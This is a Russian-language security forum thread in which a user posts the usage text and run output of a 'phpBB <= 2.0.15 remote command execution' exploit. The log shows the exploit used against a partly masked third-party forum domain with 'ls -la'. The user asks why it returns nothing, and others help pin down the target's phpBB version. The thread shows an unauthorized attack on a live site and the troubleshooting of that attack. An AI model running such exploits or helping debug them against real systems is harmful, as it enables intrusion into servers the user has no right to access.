ANTICHAT — форум по информационной безопасности, OSINT и технологиям

phpBB <= 2.0.15 remote command execution exploit
by Captain Crunch Security TeaM // www.ccteam.ru or ccteam.nukleon.us
Thanks to nukleon, nori, r57. This programm just for fun! Coded by tristram.
################################################## ##########
Usage:

c99expl.phpbb2015-interactive.php [URL] [NUM] [CMD]
params:

[URL] - URL to directory where phpBB installed e.g. http://host.tld/phpBB/ or
http://host.tld/
[NUM] - number of existing topic (e.g. 10)
[CMD] - command for execute e.g. ls or "ls -la"
c99expm.phpbb2015.php http://host.tld/phpBB/ 10 ls
################################################## ##########
Enter URL: http://forum.****.lv
Enter Topic-ID: 2
Enter CMD: ls -la
Initialization exploit... OK
Processing parameters...
URL: http://forum.****.lv
HOST: forum.*****.lv
PATH:
PORT: 80
Topic-ID: 2
Execution "ls -la" result:
+%3Bls+-la%3B+echo+
bash $

помогите... почему у меня не выдает список? вроде экс. работает...

Не подскажите точную версию...уже запарился перебирать =\
http://www.taultunleashed.com/phpbb2

phpBB 2.0
The phpBB Group : 2002

То что это 2.0 то я понял \=) вот какая это 2.0.*...13, 14, 15 , 16...вот в этом вопрос.

bogusz
исходи из того, что версия до 2.0.3 =)
т.к. в 2002 году вышло только 2.0.0, 2.0.1, 2.0.2 и 2.0.3 =)